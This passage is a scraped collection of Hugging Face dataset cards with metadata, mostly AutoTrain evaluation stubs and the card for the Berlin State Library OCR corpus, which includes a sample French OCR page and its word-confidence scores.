"### Supported Tasks and Leaderboards\n\n\n* 'image-classification': The dataset can be used to train a model for Image Classification.",
"### Languages\n\n\nThe class labels in the dataset are in English.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nA data point comprises an image URL and its classification label.",
"### Data Fields\n\n\n* 'image': A 'PIL.Image.Image' object containing the image.\n* 'label': the expected class label of the image.",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\ncf. URL",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nImagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.",
"### Annotations",
"#### Annotation process\n\n\ncf. URL",
"#### Who are the annotators?\n\n\ncf. URL",
"### Personal and Sensitive Information\n\n\ncf. URL\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\ncf. URL",
"### Discussion of Biases\n\n\ncf. URL",
"### Other Known Limitations\n\n\ncf. URL\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\ncf. URL\nand Jeremy Howard",
"### Licensing Information\n\n\nApache License 2.0.",
"### Contributions\n\n\nThis dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm."
] |
a0d9ca0b1c481c4e8b2100bb6eb0457559e3f508 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Narayana](https://huggingface.co/Narayana) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-47db8743-11885591 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T15:36:22+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Graphcore/roberta-base-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T15:38:56+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @Narayana for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Graphcore/roberta-base-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Narayana for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Graphcore/roberta-base-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Narayana for evaluating this model."
] |
2eb12757b146d9c1fbfda4e8f8d4a10c520de326 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895592 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:58:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-12-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:52:05+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-12-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-12-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
9acbc0b433d326333ebec9838d2cfd3dd96e4a6c | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895594 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:59:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "philschmid/distilbart-cnn-12-6-samsum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:47:15+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: philschmid/distilbart-cnn-12-6-samsum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: philschmid/distilbart-cnn-12-6-samsum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
09f0a5fb1b4b7bb1b18dac3c50ceeeaae00969fe | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895593 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T17:01:21+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-6-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:34:27+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-6-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: sshleifer/distilbart-cnn-6-6\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
a890935d5bd754ddc5b85f56b6f34f6d2bb4abba |
# Dataset Card for Berlin State Library OCR data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
### Supported Tasks and Leaderboards
- `language-modeling`: this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.
-
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using [langid.py: An Off-the-shelf Language Identification Tool](https://aclanthology.org/P12-3005) (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. **Note:** not all examples may have been successfully matched to the language prediction table from the original data.
The frequency of the top ten languages in the dataset is shown below:
| | frequency |
|----|------------------|
| de | 3.20963e+06 |
| nl | 491322 |
| en | 473496 |
| fr | 216210 |
| es | 68869 |
| lb | 33625 |
| la | 27397 |
| pl | 17458 |
| it | 16012 |
| zh | 11971 |
[More Information Needed]
## Dataset Structure
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
```python
{'aut': 'Doré, Henri',
'date': '1912',
'file name': '00000218.xml',
'language': 'fr',
'language_confidence': 1.0,
'place': 'Chang-hai',
'ppn': '646426230',
'publisher': 'Imprimerie de la Mission Catholique',
'text': "— 338 — Cela fait, on enterre la statuette qu’on vient d’outrager, atten dant la réalisation sur la personne elle-même. C’est l’outrage en effigie. Un deuxième moyen, c’est de représenter l’Esprit Vengeur sous la figure d’un fier-à-bras, armé d’un sabre, ou d’une pique, et de lui confier tout le soin de sa vengeance. On multiplie les incantations et les offrandes en son honneur, pour le porter au paroxysme de la fureur, et inspirer à l’Esprit malin l’idée de l’exécution de ses désirs : en un mot, on fait tout pour faire passer en son cœur la rage de vengeance qui consume le sien propre. C’est une invention diabolique imaginée pour assouvir sa haine sur l’ennemi qu’on a en horreur. Ailleurs, ce n’est qu’une figurine en bois ou en papier, qui est lancée contre l’ennemi; elle se dissimule, ou prend des formes fantastiques pour acomplir son œuvre de vengeance. Qu’on se rappelle la panique qui régna dans la ville de Nan- king ifâ ffl, et ailleurs, l’année où de méchantes gens répandirent le bruit que des hommes de papier volaient en l’air et coupaient les tresses de cheveux des Chinois. Ce fut une véritable terreur, tous étaient affolés, et il y eut à cette occasion de vrais actes de sauvagerie. Voir historiettes sur les envoûtements : Wieger Folk-Lore, N os 50, 128, 157, 158, 159. Corollaire. Les Tao-niu jift fx ou femmes “ Tao-clie'’. A cette super stition peut se rapporter la pratique des magiciennes du Kiang- sou ■n: m, dans les environs de Chang-hai ± m, par exemple. Ces femmes portent constamment avec- elles une statue réputée merveilleuse : elle n’a que quatre ou cinq pouces de hauteur ordinairement. A force de prières, d’incantations, elles finissent par la rendre illuminée, vivante et parlante, ou plutôt piaillarde, car elle ne répond que par des petits cris aigus et répétés aux demandes qu’on lui adressé; elle paraît comme animée, sautille,",
'title': 'Les pratiques superstitieuses',
'wc': [1.0,
0.7266666889,
1.0,
0.9950000048,
0.7059999704,
0.5799999833,
0.7142857313,
0.7250000238,
0.9855555296,
0.6880000234,
0.7099999785,
0.7054545283,
1.0,
0.8125,
0.7950000167,
0.5681818128,
0.5500000119,
0.7900000215,
0.7662500143,
0.8830000162,
0.9359999895,
0.7411110997,
0.7950000167,
0.7962499857,
0.6949999928,
0.8937500119,
0.6299999952,
0.8820000291,
1.0,
0.6781818271,
0.7649999857,
0.437142849,
1.0,
1.0,
0.7416666746,
0.6474999785,
0.8166666627,
0.6825000048,
0.75,
0.7033333182,
0.7599999905,
0.7639999986,
0.7516666651,
1.0,
1.0,
0.5466666818,
0.7571428418,
0.8450000286,
1.0,
0.9350000024,
1.0,
1.0,
0.7099999785,
0.7250000238,
0.8588888645,
0.8366666436,
0.7966666818,
1.0,
0.9066666961,
0.7288888693,
1.0,
0.8333333135,
0.8787500262,
0.6949999928,
0.8849999905,
0.5816666484,
0.5899999738,
0.7922222018,
1.0,
1.0,
0.6657142639,
0.8650000095,
0.7674999833,
0.6000000238,
0.9737499952,
0.8140000105,
0.978333354,
1.0,
0.7799999714,
0.6650000215,
1.0,
0.823333323,
1.0,
0.9599999785,
0.6349999905,
1.0,
0.9599999785,
0.6025000215,
0.8525000215,
0.4875000119,
0.675999999,
0.8833333254,
0.6650000215,
0.7566666603,
0.6200000048,
0.5049999952,
0.4524999857,
1.0,
0.7711111307,
0.6666666865,
0.7128571272,
1.0,
0.8700000048,
0.6728571653,
1.0,
0.6800000072,
0.6499999762,
0.8259999752,
0.7662500143,
0.6725000143,
0.8362500072,
1.0,
0.6600000262,
0.6299999952,
0.6825000048,
0.7220000029,
1.0,
1.0,
0.6587499976,
0.6822222471,
1.0,
0.8339999914,
0.6449999809,
0.7062500119,
0.9150000215,
0.8824999928,
0.6700000167,
0.7250000238,
0.8285714388,
0.5400000215,
1.0,
0.7966666818,
0.7350000143,
0.6188889146,
0.6499999762,
1.0,
0.7459999919,
0.5799999833,
0.7480000257,
1.0,
0.9333333373,
0.790833354,
0.5550000072,
0.6700000167,
0.7766666412,
0.8280000091,
0.7250000238,
0.8669999838,
0.5899999738,
1.0,
0.7562500238,
1.0,
0.7799999714,
0.8500000238,
0.4819999933,
0.9350000024,
1.0,
0.8399999738,
0.7950000167,
1.0,
0.9474999905,
0.453333348,
0.6575000286,
0.9399999976,
0.6733333468,
0.8042857051,
0.7599999905,
1.0,
0.7355555296,
0.6499999762,
0.7118181586,
1.0,
0.621999979,
0.7200000286,
1.0,
0.853333354,
0.6650000215,
0.75,
0.7787500024,
1.0,
0.8840000033,
1.0,
0.851111114,
1.0,
0.9142857194,
1.0,
0.8899999857,
1.0,
0.9024999738,
1.0,
0.6166666746,
0.7533333302,
0.7766666412,
0.6637499928,
1.0,
0.8471428752,
0.7012500167,
0.6600000262,
0.8199999928,
1.0,
0.7766666412,
0.3899999857,
0.7960000038,
0.8050000072,
1.0,
0.8000000119,
0.7620000243,
1.0,
0.7163636088,
0.5699999928,
0.8849999905,
0.6166666746,
0.8799999952,
0.9058333039,
1.0,
0.6866666675,
0.7810000181,
0.3400000036,
0.2599999905,
0.6333333254,
0.6524999738,
0.4875000119,
0.7425000072,
0.75,
0.6863636374,
1.0,
0.8742856979,
0.137500003,
0.2099999934,
0.4199999869,
0.8216666579,
1.0,
0.7563636303,
0.3000000119,
0.8579999804,
0.6679999828,
0.7099999785,
0.7875000238,
0.9499999881,
0.5799999833,
0.9150000215,
0.6600000262,
0.8066666722,
0.729090929,
0.6999999881,
0.7400000095,
0.8066666722,
0.2866666615,
0.6700000167,
0.9225000143,
1.0,
0.7599999905,
0.75,
0.6899999976,
0.3600000143,
0.224999994,
0.5799999833,
0.8874999881,
1.0,
0.8066666722,
0.8985714316,
0.8827272654,
0.8460000157,
0.8880000114,
0.9533333182,
0.7966666818,
0.75,
0.8941666484,
1.0,
0.8450000286,
0.8666666746,
0.9533333182,
0.5883333087,
0.5799999833,
0.6549999714,
0.8600000143,
1.0,
0.7585714459,
0.7114285827,
1.0,
0.8519999981,
0.7250000238,
0.7437499762,
0.6639999747,
0.8939999938,
0.8877778053,
0.7300000191,
1.0,
0.8766666651,
0.8019999862,
0.8928571343,
1.0,
0.853333354,
0.5049999952,
0.5416666865,
0.7963636518,
0.5600000024,
0.8774999976,
0.6299999952,
0.5749999881,
0.8199999928,
0.7766666412,
1.0,
0.9850000143,
0.5674999952,
0.6240000129,
1.0,
0.9485714436,
1.0,
0.8174999952,
0.7919999957,
0.6266666651,
0.7887499928,
0.7825000286,
0.5366666913,
0.65200001,
0.832857132,
0.7488889098]}
```
### Data Fields
- 'file name': filename of the original XML file
- 'text': OCR'd text for that page of the item
- 'wc': the word confidence for each token predicted by the OCR engine
- 'ppn': 'Pica production numbers' an internal ID used by the library. See [](https://doi.org/10.5281/zenodo.2702544) for more details.
'language': language predicted by `langid.py` (see above for more details)
-'language_confidence': confidence score given by `langid.py`
- publisher: publisher of the item in which the text appears
- place: place of publication of the item in which the text appears
- date: date of the item in which the text appears
- title: title of the item in which the text appears
- aut: author of the item in which the text appears
[More Information Needed]
### Data Splits
This dataset contains only a single split `train`.
## Dataset Creation
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo.
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The [dataprep.ipynb](https://huggingface.co/datasets/biglam/berlin_state_library_ocr/blob/main/dataprep.ipynb) was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
- the CSV `xml2csv_alto.csv`, which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the `datasets` library
- this CSV was augmented with language information from `corpus-language.pkl` **note** some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information
- the CSV was further augmented by trying to map the PPN to fields in a metadata download created using [https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py](https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py). **note** not all examples are successfully matched to this metadata download.
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
- the confidence scores the OCR engines used to produce the full-text materials.
- the predicted languages and associated confidence scores produced by `langid.py`
The dataset also contains metadata for the following fields:
- author
- publisher
- the place of publication
- title
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{labusch_kai_2019_3257041,
author = {Labusch, Kai and
Zellhöfer, David},
title = {{OCR fulltexts of the Digital Collections of the
Berlin State Library (DC-SBB)}},
month = jun,
year = 2019,
publisher = {Zenodo},
version = {1.0},
doi = {10.5281/zenodo.3257041},
url = {https://doi.org/10.5281/zenodo.3257041}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/berlin_state_library_ocr | [
"task_categories:fill-mask",
"task_categories:text-generation",
"task_ids:masked-language-modeling",
"task_ids:language-modeling",
"annotations_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1M<n<10M",
"language:de",
"language:nl",
"language:en",
"language:fr",
"language:es",
"license:cc-by-4.0",
"ocr",
"library",
"region:us"
] | 2022-07-26T18:40:02+00:00 | {"annotations_creators": ["machine-generated"], "language_creators": ["expert-generated"], "language": ["de", "nl", "en", "fr", "es"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1M<n<10M"], "source_datasets": [], "task_categories": ["fill-mask", "text-generation"], "task_ids": ["masked-language-modeling", "language-modeling"], "pretty_name": "Berlin State Library OCR", "tags": ["ocr", "library"]} | 2022-08-05T08:36:24+00:00 | [] | [
"de",
"nl",
"en",
"fr",
"es"
] | TAGS
#task_categories-fill-mask #task_categories-text-generation #task_ids-masked-language-modeling #task_ids-language-modeling #annotations_creators-machine-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1M<n<10M #language-German #language-Dutch #language-English #language-French #language-Spanish #license-cc-by-4.0 #ocr #library #region-us
| Dataset Card for Berlin State Library OCR data
==============================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage:
* Repository:
* Paper:
* Leaderboard:
* Point of Contact:
### Dataset Summary
>
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
>
>
>
>
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
>
>
>
### Supported Tasks and Leaderboards
* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.
*
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.
The frequency of the top ten languages in the dataset is shown below:
Dataset Structure
-----------------
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
### Data Fields
* 'file name': filename of the original XML file
* 'text': OCR'd text for that page of the item
* 'wc': the word confidence for each token predicted by the OCR engine
* 'ppn': 'Pica production numbers' an internal ID used by the library. See 
-'language\_confidence': confidence score given by 'URL'
* publisher: publisher of the item in which the text appears
* place: place of publication of the item in which the text appears
* date: date of the item in which the text appears
* title: title of the item in which the text appears
* aut: author of the item in which the text appears
### Data Splits
This dataset contains only a single split 'train'.
Dataset Creation
----------------
The dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The URL was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
* the CSV 'xml2csv\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library
* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information
* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.
#### Who are the source language producers?
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
* the confidence scores the OCR engines used to produce the full-text materials.
* the predicted languages and associated confidence scores produced by 'URL'
The dataset also contains metadata for the following fields:
* author
* publisher
* the place of publication
* title
#### Who are the annotators?
### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
Creative Commons Attribution 4.0 International
### Contributions
Thanks to @davanstrien for adding this dataset.
| [
"### Dataset Summary\n\n\n\n> \n> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.\n> \n> \n> \n\n\n\n> \n> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.\n> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).\n> \n> \n>",
"### Supported Tasks and Leaderboards\n\n\n* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.\n*",
"### Languages\n\n\nThe collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.\n\n\nThe frequency of the top ten languages in the dataset is shown below:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nEach example represents a single page of OCR'd text.\n\n\nA single example of the dataset is as follows:",
"### Data Fields\n\n\n* 'file name': filename of the original XML file\n* 'text': OCR'd text for that page of the item\n* 'wc': the word confidence for each token predicted by the OCR engine\n* 'ppn': 'Pica production numbers' an internal ID used by the library. See \n-'language\\_confidence': confidence score given by 'URL'\n* publisher: publisher of the item in which the text appears\n* place: place of publication of the item in which the text appears\n* date: date of the item in which the text appears\n* title: title of the item in which the text appears\n* aut: author of the item in which the text appears",
"### Data Splits\n\n\nThis dataset contains only a single split 'train'.\n\n\nDataset Creation\n----------------\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.\n\n\nThe URL was used to create this dataset.\n\n\nTo make the dataset more useful for training language models, the following steps were carried out:\n\n\n* the CSV 'xml2csv\\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library\n* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information\n* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process\n\n\nThis dataset contains machine-produced annotations for:\n\n\n* the confidence scores the OCR engines used to produce the full-text materials.\n* the predicted languages and associated confidence scores produced by 'URL'\n\n\nThe dataset also contains metadata for the following fields:\n\n\n* author\n* publisher\n* the place of publication\n* title",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nThis dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases\n\n\nAs with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
